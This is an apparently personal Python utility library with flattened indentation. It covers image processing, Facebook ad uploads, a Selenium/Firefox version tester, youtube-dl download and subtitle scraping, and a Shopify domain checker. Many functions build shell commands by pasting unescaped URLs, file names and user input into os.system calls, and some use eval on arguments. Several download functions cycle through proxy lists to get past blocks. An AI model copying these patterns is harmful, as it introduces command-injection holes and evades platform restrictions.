size = list(tcer(img.shape[:2]))
larger_side = max(size)
x = np.full((larger_side,larger_side,3),77,dtype=np.uint8)
to_subtract = 0
if size[0] > size[1]:
diff = int(larger_side - size[1])
if diff % 2 == 1:
to_subtract = 1
diff = int(diff / 2)
diff1 = diff
x[diff:int(larger_side-diff)-to_subtract,0:larger_side] = img
elif size[1] > size[0]:
diff = int(larger_side - size[0])
if diff % 2 == 1:
to_subtract = 1
diff = int(diff / 2)
diff1 = diff
x[0:larger_side,diff:int(larger_side-diff1)-to_subtract] = img
else:
x[0:larger_side,0:larger_side] = img
cv2.imwrite(address,x)
address = Images().resize(address,size_)
return address
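# Sketch: the shorter dimension is centre-padded onto a grey (77,77,77) square canvas so the
# picture becomes square, then the square is resized to `size` via Images().resize.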
def get_image_size(self, address):
return Image.open(address).size
def image_size(self, x):
import PIL
if type(x) == PIL.JpegImagePlugin.JpegImageFile:
return x.size
else:
return tuple(tcer(x.shape[:2]))
def download_and_resize(self, url, size=1200, save_path = None):
save_path = self.download(url, save_path=save_path)
im = Image.open(save_path).convert("RGB")
import numpy as np
image_size = np.array(im.size)
ratio = max(image_size)/size
new_size = image_size / ratio
new_size = [int(i) for i in new_size]
im = im.resize(new_size)
im.save(save_path)
return save_path
def black_and_white(self, address):
from PIL import Image
image_file = Image.open(address) # open colour image
image_file = image_file.convert("L") # convert image to black and white
image_file.save(address)
return address
def fb_image_upload(self, x, init_shop=None, hash=False):
if init_shop == None:
init_shop = All(Shop)[0].shop_abbreviation
if not os.path.exists(x):
x = Images().download(x)
shop = Shop()(init_shop)
image = AdImage(parent_id='act_%s'%shop.Facebook_Business_Ad_Account_ID)
image[AdImage.Field.filename] = x
image.remote_create()
time.sleep(1.2)
return image['url'] if hash == False else image['hash']
def bitly_url(self,url):
return json.loads(requests.get("https://api-ssl.bitly.com/v3/shorten?access_token={}&longUrl={}".format(Muta()().bitly_access_token, url)).text)["data"]["url"]
"""
bitly_url("https://google.com")
"""
def sharpen(self,x):
img = Image.open(x)
img = img.convert("RGB")
img_sharp = img.filter(ImageFilter.SHARPEN)
#img_sharp.show()
img_sharp.save(x)
return x
def contrast(self,x):
im = Image.open(x)
enhancer = ImageEnhance.Contrast(im)
enhanced_im = enhancer.enhance(1.2)
enhanced_im.save(x)
return x
def contrast_sharpen(self,x,sharpen=True,contrast=True):
im = Image.open(x)
img_contrast = ImageEnhance.Contrast(im)
if contrast:
im = img_contrast.enhance(1.05)
if sharpen:
im = im.convert("RGB")
im = im.filter(ImageFilter.SHARPEN)
im.save(x, optimize=True)
return x
def compress(self, fn):
from PIL import Image
if os.path.getsize(fn) > 153600:
img = Image.open(fn)
img = img.resize(img.size,Image.ANTIALIAS)
img.save(fn,optimize=True,quality=80)
return fn
class Selenium_Firefox_Matrix_Test:
def some_test_results(self):
if "geckodriver 18":
['quas.py', '3.4.3', '53']
['quas.py', '3.4.1', '57']
['quas.py', '3.4.3', '52']
['quas.py', '3.14.0', '52']
['quas.py', '3.6.0', '52']
['quas.py', '3.7.0', '52']
['quas.py', '3.4.1', '54']
['quas.py', '3.7.0', '53']
['quas.py', '3.6.0', '53']
['quas.py', '3.14.0', '53']
['quas.py', '3.14.0', '57']
['quas.py', '3.6.0', '57']
['quas.py', '3.7.0', '57']
['quas.py', '3.4.3', '54']
['quas.py', '3.14.0', '54']
['quas.py', '3.7.0', '54']
['quas.py', '3.6.0', '54']
['quas.py', '3.4.1', '53']
['quas.py', '3.4.1', '52']
['quas.py', '3.4.3', '57']
['quas.py', '3.13.0', '57']
['quas.py', '3.13.0', '54']
['quas.py', '3.12.0', '54']
['quas.py', '3.12.0', '52']
['quas.py', '3.13.0', '52']
['quas.py', '3.13.0', '53']
['quas.py', '3.12.0', '53']
['quas.py', '3.7.0', '60']
['quas.py', '3.6.0', '60']
['quas.py', '3.14.0', '60']
['quas.py', '3.10.0', '60']
['quas.py', '3.11.0', '60']
['quas.py', '3.9.0', '60']
['quas.py', '3.8.0', '60']
['quas.py', '3.4.0', '60']
['quas.py', '3.5.0', '60']
['quas.py', '3.14.1', '60']
['quas.py', '3.4.2', '60']
['quas.py', '3.12.0', '57']
if "geckodriver 19":
['quas.py', '3.4.3', '62']
['quas.py', '3.11.0', '61']
['quas.py', '3.10.0', '61']
['quas.py', '3.9.0', '62']
['quas.py', '3.8.0', '62']
['quas.py', '3.10.0', '62']
['quas.py', '3.11.0', '62']
['quas.py', '3.8.0', '61']
['quas.py', '3.9.0', '61']
['quas.py', '3.5.0', '61']
['quas.py', '3.4.0', '61']
['quas.py', '3.4.0', '62']
['quas.py', '3.5.0', '62']
['quas.py', '3.4.2', '62']
['quas.py', '3.14.1', '61']
['quas.py', '3.4.2', '61']
['quas.py', '3.14.1', '62']
def __init__(self):
exec("from soda.can import *", globals())
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.firefox.firefox_profile import FirefoxProfile
from selenium.webdriver.firefox.firefox_binary import FirefoxBinary
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.common.by import By
from selenium.webdriver.chrome.options import Options
from selenium.webdriver import ActionChains
from selenium import webdriver
from pyvirtualdisplay import Display
from selenium.webdriver.common.alert import Alert
from sys import platform
import selenium.webdriver.support.expected_conditions as EC
a = ["3.0.0",
"3.0.1",
"3.0.2",
"3.0.4",
"3.3.0",
"3.4.0",
"3.4.1",
"3.4.2",
"3.4.3",
"3.5.0",
"3.6.0",
"3.7.0",
"3.8.0",
"3.9.0",
"3.10.0",
"3.11.0",
"3.12.0",
"3.13.0",
"3.13.1",
"3.14.0",
"3.14.1"]
b = [
"/Applications/Firefox 61.app/Contents/MacOS/firefox-bin",
"/Applications/Firefox 62.app/Contents/MacOS/firefox-bin",
"/Applications/Firefox 63.app/Contents/MacOS/firefox-bin",
"/Applications/Firefox 64.app/Contents/MacOS/firefox-bin",
"/Applications/Firefox 46.app/Contents/MacOS/firefox-bin",
]
if __name__ == "__main__":
import sys
sys.argv[1]
print(sys.argv)
j = sys.argv[2]
j = ["/Applications/Firefox %s.app/Contents/MacOS/firefox-bin"%j for i in os.listdir("/Applications") if tryreturn(decimal_re, i) == int(j)][0]
print(j)
profile = "sele"
profile_path = os.path.expanduser("~/Library/Application Support/Firefox/Profiles")
executable_path = os.path.expanduser("~/tavern/tavern/soda/geckodriver 24")
firefox_profile = FirefoxProfile(homepath("~/Library/Application Support/Firefox/Profiles/%s" % (( [i for i in os.listdir(os.path.expanduser("~/Library/Application Support/Firefox/Profiles")) if profile == "".join(i.split(".")[1:]) ][0] ))))
firefox_binary = FirefoxBinary(j) # Make sure selenium is 3.8.0
wd = webdriver.Firefox(executable_path=executable_path, firefox_profile=firefox_profile, firefox_binary=firefox_binary)
# TESTER 1 #
for i in a:
for j in b:
F = subprocess.getoutput("pip install selenium==%s"%i)
greenprint(F)
if "Could not find a version that satisfies the requirement selenium" in F:
print("continue-")
continue
R = subprocess.getoutput("~/tavern/bin/python3.5 quas.py %s %s"%(i, decimal_re(j)))
redprint(R)
with open("%s_%s.txt" % (i, decimal_re(j)) , "w") as f:
f.write(R)
os.system("killall firefox-bin")
# TESTER 2 #
R = os.listdir()
for i in R:
try:
if "Traceback" not in open(i, "r").read():
print(i)
if "DEBUG" not in open(i).read():
distinct_print(open(i).read())
except Exception as e:
# redprint(e)
pass
class Slime(DecisionTree):
def __init__(self):
exec("from moviepy.editor import *")
from moviepy.editor import VideoFileClip
#from mutagen import MP3
from pydub import AudioSegment
from gtts import gTTS
globals().update(locals())
print("hello")
print(" -- most often, youtube_video_download(7) will be used -- ")
self.functions_sorted = [
"youtube_mp3_download",
"scdl",
"download",
"halfavideo",
"resizevideo",
"youtube_channel_download",
"youtube_playlist_download",
"youtube_artist_download",
"youtube_subtitle_download",
"youtube_proxy_download",
"splice",
"youtube_search_download",
"mass_videos_to_subtitles",
"download_a_song",
"download_en_masse",
"convert_current_directory_to_mp3",
"youtube_video_download",
"vaudioop",
"mp3_compile",
"mp3_to_mp4",
"mp4_to_mp3",
"mp3_to_wav",
"wav_to_mp3",
"wav_to_array",
"speak",
"speak2",
"save",
"get_sound_volume_output",
]
def resizevideo(self,infile,outfile):
os.system("ffmpeg -i '%s' -s 640x360 -c:a copy '%s' ;"%(infile,outfile))
def wav_to_array(self, infile):
from scipy.io.wavfile import read
a = read(infile)
return numpy.array(a[1],dtype=float)
def wav_to_mp3(self, infile, outfile):
os.system("ffmpeg -i '%s' -codec:a libmp3lame -qscale:a 2 '%s'"%(infile,outfile))
def mp3_to_wav(self, infile, outfile):
os.system("ffmpeg -i '%s' -acodec pcm_u8 -ar 22050 '%s'"%(infile,outfile))
def download_en_masse(self, data):
data = data.split(',')
url = data.pop(0)
outfile = data.pop(0)
isotimes = data
for isotime in isotimes:
start_isotime, end_isotime = isotime.split('-')
print("downloading %s %s-%s"%(url, start_isotime, end_isotime))
self.download(url, outfile, 'mp4', start_isotime, end_isotime)
def mass_videos_to_subtitles(self, word):
import os, requests
os.makedirs(word, exist_ok=True)
os.chdir(word)
many_urls = []
for i in range(30):
x = requests.get("https://www.youtube.com/results?search_query=%s&page=%s"%(word,i))
urls = re.findall(r'(?s)href="(/watch.*?)"', x.text)
urls = list(set(urls))
urls = ["https://youtube.com%s"%i for i in urls]
many_urls.extend(urls)
many_urls = list(set(many_urls))
print("found %s more urls, total of many_urls is %s" % (len(urls), len(many_urls)))
#os.system("youtube-dl --sub-lang en --sub-format vtt --write-auto-sub --skip-download https://www.youtube.com/results?search_query=%s&page=15"%(word.replace(" ","+")))
#os.system("youtube-dl --sub-lang en --sub-format vtt --write-auto-sub --skip-download https://www.youtube.com/results?q=%s&page=%s"%(word.replace(" ","+"), i))
#os.system("youtube-dl --ignore-errors --all-subs -f 18 -cit https://www.youtube.com/results?q=%s&page=%s"%(word, i))
for i in many_urls:
os.system("youtube-dl --sub-lang en --sub-format vtt --write-auto-sub --skip-download %s"%i)
def to_txt(fn):
with open(fn, "r") as f:
txt = f.read()
# <>s
pattern = r'(<.*?>)'
txt = re.sub(pattern, "", txt)
# timestamps
pattern = r'(.*-->.*)'
txt = re.sub(pattern, "", txt)
txt = txt.split("\n")
load = []
for i in txt:
i = i.strip()
load.append(i)
txt = "\n".join(load)
for i in range(20):
txt = txt.replace("\n\n", "\n")
txt = txt.split("\n")
load = []
# Only append if line is not duplicate.
for idx, i in enumerate(txt[:-1]):
try:
if txt[idx] != txt[idx+1]:
load.append(i)
except Exception as e:
print(e)
txt = "\n".join(load)
return txt
def lineskip(txt):
lineskips = [" but", " um", " I'm", " I"]
txt = txt.replace("\n", " ")
for i in lineskips:
txt = txt.replace(i, "\n%s"%i)
return txt
input("ready to change text on the downloaded srcs?")
for i in os.listdir():
if "vtt" not in i:
continue
print("working on file '%s'"%i)
txt = to_txt(i)
txt = lineskip(txt)
with open(i, "w") as f:
f.write(txt)
def youtube_mp3_download(self, url):
i = input("artist&track like this: '%s - %s' ||: ")
self.download(url, outfile=i, format="mp3")
artist_name, track_name = i.split(" - ")
track_name = track_name + ".mp3"
print('artist name: %s' % artist_name)
print('track name: %s' % track_name)
os.system('mv "%s.mp3" "%s"' % (i, track_name))
os.system('id3v2 -a "%s" "%s"' % (artist_name,track_name))
os.system('id3v2 -t "%s" "%s"' % (track_name.replace(".mp3", ""), track_name))
print('\n')
os.system('id3v2 --list "%s"' % track_name)
os.system('mv "%s" ~/Documents/' % track_name)
def download_a_song(self, url, song, album, artist):
#https://www.youtube.com/watch?v=MW1mnujV6eI
song = song.replace("_", " ")
album = album.replace("_", " ")
artist = artist.replace("_", " ")
system("youtube-dl --extract-audio --audio-format mp3 %s" % url)
track_name = [i for i in os.listdir() if ".mp3" in i][0]
system('mv "%s" "%s"' % (track_name, "%s.mp3"%song))
track_name = "%s.mp3" % song  # tag the renamed file, not the old filename
system('id3v2 -a "%s" "%s"' % (artist, track_name))
system('id3v2 -A "%s" "%s"' % (album, track_name))
system('id3v2 -t "%s" "%s"' % (song, track_name))
system('mv *.mp3 ~/Documents/')
def download(self, url, outfile, format, start_isotime=None, end_isotime=None):
print("url, outfile, format='mp3', start_isotime=None, end_isotime=None");
if format == 'mp3':
system("youtube-dl --extract-audio --audio-format mp3 --output '{}.%(ext)s' {}".format(outfile.replace('.mp3',''), url))
fn = '%s.mp3' % outfile
while fn not in os.listdir('.'):
time.sleep(1)
print("Waiting...")
if start_isotime:
sliced_fn = ('%s-%s-%s'%(start_isotime, end_isotime, fn)).replace(':', '')
sliced = self.splice(fn, start_isotime, end_isotime, 'mp3')
sliced.export(sliced_fn)
system('rm %s'%fn)
return sliced_fn
return fn
elif format == 'mp4':
system("youtube-dl -f 18 --output '{}.%(ext)s' {}".format(outfile.replace('.mp4',''), url))
time.sleep(5)
fn = '%s.mp4' % outfile
while fn not in os.listdir('.'):
time.sleep(1)
print("Waiting...")
if start_isotime:
print("splicing...")
sliced = self.splice(fn, start_isotime, end_isotime, format='mp4')
system('rm %s'%fn)
def splice(self, fn, start_isotime, end_isotime, format):
if format == 'mp3':
sound = AudioSegment.from_mp3(fn)
start = self.isotime_to_milliseconds(start_isotime)
end = self.isotime_to_milliseconds(end_isotime)
spliced_sound = sound[start:end]
spliced_sound.export("%s-%s_%s"%(start_isotime,end_isotime,fn.split('/')[-1]))
return spliced_sound
elif format == 'mp4':
video = VideoFileClip(fn)
start = self.isotime_to_seconds(start_isotime)
end = self.isotime_to_seconds(end_isotime)
video = video.subclip(start, end)
sliced_fn = ('%s-%s-%s'%(start_isotime, end_isotime, fn)).replace(':', '')
print('sliced_fn: %s'%sliced_fn)
video.write_videofile(sliced_fn, fps=24)
return video
def youtube_search_download(self, query):
query = query.replace('_','+')
system("youtube-dl --ignore-errors -f 18 -cit https://www.youtube.com/results?q=%s&page=1"%query)
def youtube_channel_download(self, url, format, bestquality="False", proxy="False"):
proxy = eval(proxy)
bestquality = eval(bestquality)
print("please specify a format, mp4/m4a, or mp3 || note in future will have need cvrt webm to m4a.. ")
x = requests.get(url).text
folder_name = or_list(lambda:SOUPY(x,"h2","class","epic-nav-item-heading")[0].text.strip(),SOUPY(x,"span","class","qualified-channel-title-text")[0].text)
print("downloading to ~/Documents/%s" % folder_name)
if format == "mp3":
###
if proxy == False:
system('mkdir "/Users/$USER/Documents/%s" && cd "/Users/$USER/Documents/%s" && youtube-dl --extract-audio --audio-format mp3 --ignore-errors %s &' % (folder_name,folder_name,url))
###
###
elif proxy == True:
proxy_list = get_us_ip_list() # stored in general-utils
for idx, proxy in enumerate(proxy_list):
print("#%s" % idx)
#response = getoutput("youtube-dl --proxy %s %s" % (proxy, url))
response = getoutput('mkdir "/Users/$USER/Documents/%s" && cd "/Users/$USER/Documents/%s" && youtube-dl --extract-audio --audio-format mp3 --ignore-errors --proxy %s "%s" & '%(folder_name,folder_name,proxy,url))
print(response)
if "[download] Destination:" in response:
print("found it -- proxy 1")
###
elif format == "m4a" or format == "mp4":
if proxy == False:
if bestquality == False:
system('mkdir "/Users/$USER/Documents/%s" ; cd "/Users/$USER/Documents/%s" && youtube-dl --ignore-errors -f 18 "%s" '%(folder_name,folder_name,url))
elif bestquality == True:
bestqualitie = self.get_best_qualitie(url)
print("bestqualitie: %s" % bestqualitie)
system('mkdir "/Users/$USER/Documents/%s" ; cd "/Users/$USER/Documents/%s" && youtube-dl --ignore-errors -f %s "%s" '%(folder_name,folder_name, bestqualitie, url))
elif proxy == True:
proxy_list = get_us_ip_list() # stored in general-utils
random.shuffle(proxy_list)
for idx, proxy in enumerate(proxy_list):
print("#%s" % idx)
#response = getoutput("youtube-dl --proxy %s %s" % (proxy, url))
response = getoutput('mkdir "/Users/$USER/Documents/%s" ; cd "/Users/$USER/Documents/%s" && youtube-dl --ignore-errors --proxy %s "%s" '%(folder_name,folder_name,proxy,url))
print(response)
if "[download] Destination:" in response:
print("found it -- proxy 1")
try:
if format == "mp3":
for i in os.listdir(homepath("~/Documents/%s" % folder_name)):
system('id3v2 -a "%s" "/Users/$USER/Documents/%s/%s"' % (folder_name,folder_name,i))
system('id3v2 -t "%s" "/Users/$USER/Documents/%s/%s"' % (i,folder_name,i))
except:
# untested
pass
def get_best_qualitie(self, url):
q = getoutput("youtube-dl -F '%s'"% url)
qualities = {}
for i in q.split("\n"):
if " mp4 " in i:
note=re.findall(r" ([0-9]+p)", i)
format_=re.findall(r"(^[0-9]+) ", i)
if note != []:
qualities[format_[0]] = int(note[0].replace("p",""))
best_format = None
best_resolution = -1
for format_ in qualities:
if qualities[format_] > best_resolution:
best_resolution = qualities[format_]
best_format = format_
return best_format
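"""
Usage note (sketch): get_best_qualitie(url) parses `youtube-dl -F` output and returns
the format code of the highest-resolution mp4 stream; youtube_channel_download with
bestquality=True passes this straight to the `-f %s` flag.
"""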
def get_sound_volume_output(self, seconds=10):
import sounddevice as sd
import numpy as np
def print_sound(indata,outdata,frames,time,status):
volume_norm = np.linalg.norm(indata)*10
print("|" * int(volume_norm))
with sd.Stream(callback=print_sound):
sd.sleep(seconds * 1000)
def youtube_playlist_download(self, url, format="mp3", folder_name = None):
print("please specify a format, mp4/m4a, or mp3 || note in future will have need cvrt webm to m4a.. ")
folder_name = url.split("/")[-1] if folder_name == None else folder_name
print("downloading to ~/Documents/%s" % folder_name)
if format == "mp3":
system("mkdir ~/Documents/%s ; cd ~/Documents/%s && youtube-dl --extract-audio --audio-format mp3 --ignore-errors %s &" % (folder_name,folder_name,url))
elif format == "m4a" or format == "mp4":
system('mkdir ~/Documents/%s ; cd ~/Documents/%s && youtube-dl --ignore-errors -f 18 "%s" &'%(folder_name,folder_name,url))
def youtube_artist_download(self):
artist = OSA.log("artist?:")
playlist_urls = []
while True:
x = str(pyperclip.paste()).split("&playnext")[0]
if "playlist" in x and x not in playlist_urls:
playlist_urls.append(x)
if x == "end":
break
time.sleep(1)  # poll the clipboard once a second instead of busy-looping
os.makedirs(homepath("~/Documents/%s"%(artist)),exist_ok=True)
for i in playlist_urls:
title = SOUP(requests.get(i).text).findAll("h1",attrs={"class":"pl-header-title"})[0].text.strip()
y = homepath("~/Documents/%s/%s"%(artist,title))
os.makedirs(y,exist_ok=True)
os.chdir(y)
os.system("youtube-dl --extract-audio --audio-format mp3 --ignore-errors %s"%(i))
os.system("id3v2 -a '%s' *"%(artist))
os.system("id3v2 -A '%s' *"%(title))
# def youtube_artist_download(self):
# artists = OSA.log("artists (delimited by ', ')?:")
# ss = Browser()("ch")
# for artist in artists:
# ss.get("https://www.youtube.com/results?search_query=%s"%(artist))
# ss.fcns("ytd-search-refinement-card-renderer")
def convert_current_directory_to_mp3(self):
for fn in os.listdir():
if '.mp4' == fn[-4:]:
self.mp4_to_mp3(fn, fn.replace('.mp4','.mp3'))
os.remove(fn)
def youtube_video_download(self, url):
system('youtube-dl -f 18 -citw -v %s'%url)
def isotime_to_milliseconds(self, isotime):
minutes, seconds = isotime.split(':')
milliseconds = 1000 * ((int(minutes)*60)+int(seconds))
return milliseconds
def isotime_to_seconds(self, isotime):
minutes, seconds_ = isotime.split(':')
seconds = ((int(minutes)*60)+int(seconds_))
return seconds
def milliseconds_to_isotime(self, milliseconds):
seconds = int((milliseconds/1000)%60)
minutes = int(((milliseconds/1000)-seconds)/60)
return '%s:%s' % (minutes, seconds)
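"""
Round-trip example (sketch) for the time helpers above, assuming "MM:SS" input:
isotime_to_milliseconds("1:30") -> 90000
isotime_to_seconds("1:30") -> 90
milliseconds_to_isotime(90000) -> "1:30"
"""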
def vaudioop(self, audio_file_name, video_file_name, output_file_name):
audio = (AudioFileClip(audio_file_name))
clip = (VideoFileClip(video_file_name, audio=False))
edited_video = (clip.fx(vfx.loop, duration=audio.duration))
final = (edited_video.set_audio(audio))
final.write_videofile(output_file_name, fps=clip.fps,
audio_bitrate="1000k", bitrate="4000k")
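"""
Example (sketch, assuming local files "track.mp3" and "loop.mp4" exist):
Slime().vaudioop("track.mp3", "loop.mp4", "final.mp4")
# loops loop.mp4 until it covers the full duration of track.mp3, attaches the audio,
# and writes final.mp4 at the clip's original fps.
"""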
# [ FINAL ]
def mp3_compile(self, crossfade=2):
print("this will compile the mp3 files in this directory... crossfade inputtable")
out_fn = input("output mp3 filename?: ")
payload = AudioSegment.from_mp3('silence')
for idx, i in enumerate(os.listdir('.')):
print('%s. %s'%(idx, i))
numbers = input("Numbers delimited by ', '?: ")
numbers = list(map(int, numbers.split(', ')))
tracktimes = []
for i in numbers:
filename = os.listdir('.')[i]
payload += AudioSegment.from_mp3(filename)
tracktimes.append("%s : %s" % (filename, self.milliseconds_to_isotime(len(payload))))
payload += AudioSegment.from_mp3('silence') * crossfade
print('\n'.join(tracktimes))
payload.export(out_fn)
@timeit
def mp3_to_mp4(self, picture, mp3, out='final.mp4'):
Images().resize(picture, 1920)
system("ffmpeg -loop 1 -i %s -i %s -c:v libx264 -c:a aac -strict experimental -b:a 192k -shortest -preset ultrafast %s" % (picture,mp3,out))
def mp4_to_mp3(self, fn, outfile):
clip = VideoFileClip(fn) # .subclip(0,20)
clip.audio.write_audiofile(outfile)
def scdl(self, artist, link):
from mutagen.mp3 import MP3
os.makedirs(homepath("~/Documents/%s"%(artist)))
os.chdir(homepath("~/Documents/%s"%(artist)))
os.system("scdl --onlymp3 -c -t -l %s"%(link))
os.system('id3v2 -a """%s""" *'%(artist))
for i in os.listdir():
audio = MP3(i)
if audio.info.length < 45:
print("%s less than 45 seconds in runtime, it is %s. deleting..." % (i, audio.info.length))
os.remove(i)
def halfavideo(self, count=8, fn="Test.mp4"):
print("inputs are count, fn ")
command = "ffmpeg -i %s -filter:a '%s' -vn %s_slower_%s" \
% (fn, ("atempo=0.5 "*count).strip().replace(" ", ","), count, fn)
print(command)
print("%s Times Slower" % 0.5**count)
import os
os.system(command)
def youtube_proxy_download(self, url):
# ip_regex = r"\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b"
proxy_list = get_us_ip_list() # stored in general-utils
for idx, proxy in enumerate(proxy_list):
print("#%s" % idx)
#response = getoutput("youtube-dl --proxy %s %s" % (proxy, url))
response = getoutput("youtube-dl --sub-lang en --sub-format vtt --write-auto-sub --proxy %s %s" % (proxy, url))
print(response)
if "[download] Destination:" in response:
print("found it -- proxy 1")
return response
def youtube_subtitle_download(self, url):
print("youtube subtitle downloading url: %s" % url)
def dl(url):
x = getoutput("youtube-dl --sub-lang en --sub-format vtt --write-auto-sub --skip-download %s" % url)
x = x.split(": ")[-1]
getoutput("mv '%s' '%s'" % (x, x.replace(" ", "_")))
return x.replace(" ", "_")
def to_txt(fn):
with open(fn, "r") as f:
txt = f.read()
# <>s
pattern = r'(<.*?>)'
txt = re.sub(pattern, "", txt)
# timestamps
pattern = r'(.*-->.*)'
txt = re.sub(pattern, "", txt)
txt = txt.split("\n")
load = []
for i in txt:
i = i.strip()
load.append(i)
txt = "\n".join(load)
for i in range(20):
txt = txt.replace("\n\n", "\n")
txt = txt.split("\n")
load = []
# Only append if line is not duplicate.
for idx, i in enumerate(txt[:-1]):
try:
if txt[idx] != txt[idx+1]:
load.append(i)
except Exception as e:
print(e)
txt = "\n".join(load)
return txt
def lineskip(txt):
lineskips = [" but", " um", " I'm", " I"]
txt = txt.replace("\n", " ")
for i in lineskips:
txt = txt.replace(i, "\n%s"%i)
return txt
def main(url):
fn = dl(url)
txt = to_txt(fn)
txt = lineskip(txt)
with open("%s.txt"%fn, "w") as f:
f.write(txt)
main(url)
print("success")
def speak(self, text = None, lang="en", slow=False):
if text == None: text = multi_input("Input text to speak: ").replace("\n", ". ")
tts = gTTS(text, lang=lang, slow=slow)
tts.save("out.mp3")
os.system("afplay out.mp3 && rm out.mp3 &")
def speak2(self, text = None):
if text == None: text = multi_input("Input text to speak: ").replace("\n", ". ")
os.system('say """%s""" &' % text)
def save(self, text, output, lang="en", slow=False):
text = multi_input("Input text to speak: ").replace("\n", ". ") if text==None else text
tts = gTTS(text, lang=lang, slow=slow)
tts.save(output)
def translate(self, to_translate, to_language="en", from_language="auto"):
from mtranslate import translate
return translate(to_translate, to_language, from_language)
def add_videos(self, files, destination):
files = lmap(lambda i:("'%s'"%(i)), files)
os.system("mencoder -forceidx -ovc copy -oac pcm -o '%s' %s"%(destination, Join(" ",files)))
def get_albums_from_wikipedia(self,url="https://en.wikipedia.org/wiki/1969_in_music"):
""" url = "https://en.wikipedia.org/wiki/1969_in_music" """
a = read_html(url)
a = [i for i in a if "Album" in str(i)]
redprint(len(a))
a = sum(a,[])
redprint(len(a))
return a
def audio_record(self):
# Other aliases: record_wav, record_sound, record_self, record_audio, mp3_record, wav_record
address = greeninput("address?: ")
( [redprint("address in os.listdir()"),0/0] ) if(0!=os.listdir().count(address)) else( [redprint("address `%s` not in os.listdir()"%address)] )
OSA(None, ["cmd_arrow_right"]) # shift aside desktop windows.
os.system("""/usr/local/bin/sox -d "%s" """ % (address))
def tests(self):
test_url = 'https://www.youtube.com/watch?v=PN7HJBodm8o'
self.download(test_url, outfile='test_download', format='mp3')
print('test done')
self.download(test_url, outfile='test_download2', format='mp3', start_isotime='00:10', end_isotime='1:10')
print('test done')
self.download(test_url, outfile='test_download3', format='mp4')
print('test done')
self.download(test_url, outfile='test_download4', format='mp4', start_isotime='00:10', end_isotime='1:10')
print('test done')
self.mp4_to_mp3(input('mp4_to_mp3?:'), input("outfile?: "))
self.mp3_compile()
def check_domain_name_via_shopify(domain):
if(0!=len(re.findall(r"\d+",domain))):
OSA.display_dialog("Numbers are not support in domain in this project. Please try again.", text_prompt = False, buttons=["OK"])
return
zo = "https://www.shopify.com/tools/domain-name-generator/search?utf8=%E2%9C%93&query={}&button=&tool=domain_name_generator"
po = zo.format(domain)
vo = requests.get(po).text
zox = re.findall(r"""polling_exact_id.*?value="(.*)" """,vo)
if len(zox) == 0:
OSA.display_dialog("domain %s is not available.", text_prompt = False, buttons=["OK"])
else:
zox = zox[0]
idv = 0
bung = []
while True:
idv += 1
kooks = ""
def run():
blech = "https://www.shopify.com/tools/domain-name-generator/poll?pollingID={}&page={}".format(zox, idv)
kooks = requests.get(blech).text
distinct_print(kooks)
if kooks == '{"results":"-PENDING-"}':
print("something as -pending-")
return run()
else:
return kooks
kooks = run()
if """{"results":[]}""" == kooks:
break
else:
bung.append(kooks)
bang = pool(lambda x: json.loads(x)["results"], bung).result()
try:beng = sum(bang, [])
except:print(bang[0])
nos = pool(lambda x: AttrDict(x), beng).result()
keycall("__delitem__", nos, "shop_name")
if not keyequals("domain_name", domain, nos):
dialog = "domain %s is not available or already purchased.\nIf it is owned by you, please continue normally.\nHere are your other options:\n%s"%(domain, "\n".join(["%s is %s at $%s per year"%(i.domain_name, ("Available")if(True==i.available)else("not available"), i.price) for i in nos]))
if False == keyequals("domain_name", domain, nos)[0].available:
dialog = "domainc %s is not available or already purchased.\nIf it is owned by you, please continue normally.\nHere are your other options:\n%s"%(domain, "\n".join(["%s is %s at $%s per year"%(i.domain_name, ("Available")if(True==i.available)else("not available"), i.price) for i in nos]))
if True == keyequals("domain_name", domain, nos)[0].available:
dialog = "domain %s is available at $%s per year" % (domain, keyequals("domain_name", domain, nos)[0].price)
OSA.display_dialog(dialog, text_prompt = False, buttons = ["OK"])
class My_Requests:
process_ = False
help = lambda self: redprint(""" def request(self,process_count=4,timeout=10,notInUrl="ø",notInText="ø",proxy=True): """)
requesting = lambda self: process(lambda: [self.request(no_return=True),self.requesting()if(0!=len(Filter(Request,x=False)))else([-1,redprint("Empty")])])
def request(self,process_count=10,timeout=10,notInUrl="ø",notInText="ø",proxy=True,url=None,helper_count = 500,no_return = False):
#url = "https://google.com"
#timeout=10
#notInUrl="ø"
#notInText="ø"
not_requested = Filter_Get_Randoms(Request,x=False,count=helper_count)if(None==url)else( [setitem(globals(),"url_specified_request",Create(Request,w=url)),Filter(Request,id=globals()["url_specified_request"].id)][1] )
not_requested = list(not_requested)
__special_metric__ = len(not_requested) + 1
for idx_z, i in enumerate(range(helper_count)):
__special_metric__ = __special_metric__ - 1
redprint("__special_metric__: %s, idx_z: %s" % (__special_metric__,idx_z))
if __special_metric__ == 0:
return "None"
self.new = not_requested.pop(0)
magentaprint("self.new: %s" % self.new)
if self.new.notInText: notInText = self.new.notInText
if self.new.notInUrl: notInUrl = self.new.notInUrl
if not self.new.cookies_label:
a = requests.get(self.new.w)
distinct_print(a.status_code)
""" ::: hnsr y ts in hr. tk out. amazon_add gv me EROR. ::: """ # ({[({[[[\\Took\\it\\out\\and\\it\\was\\fine.]]]]]}})})
""" ::: Upon inspection, the ABOVE THING, i said, well. if amazon in url, and a's status_code was 503... LOL. ::: """
if((self.new.w.find("amazon")>-1)and(503==a.status_code)): return self.request(process_count=process_count,timeout=timeout,notInUrl=notInUrl,notInText=notInText,proxy=proxy,url=None,helper_count=helper_count,no_return=no_return)
if (0!=a) and (-1!=getattr(a,"status_code",-1)) and (notInUrl not in getattr(a,"url",notInUrl)) and (notInText not in getattr(a,"text",notInText)):
if no_return == True:
Update(self.new,y=a.text,x=True,time_added=datetime.now()).y
continue
else:
""" ::: Not sure why I took this out. ::: """
#1
return Update(self.new,y=a.text,x=True,time_added=datetime.now()).y
print("here")
#magentaprint(self.new.y)
""" """
s = None
if self.new.cookies_label:
s = requests.Session()
s.headers = session_headers
cookies = None
cookies = cookies_to_database(username=self.new.cookies_label.split("|")[0],website_name=self.new.cookies_label.split("|")[1],reverse=True)
s = cookies_to_session(cookies, s)
a = s.get(self.new.w)
redprint("[%s][%s]"% (a.status_code, self.new.w))
if (0!=a) and (-1!=getattr(a,"status_code",-1)) and (notInUrl not in getattr(a,"url",notInUrl)) and (notInText not in getattr(a,"text",notInText)):
redprint("[ensuring] `%s` not in `a.text`: %s" % (notInText, notInText not in a.text))
redprint("[ensuring] `%s` not in `a.url`: %s" % (notInUrl, notInUrl not in a.text))
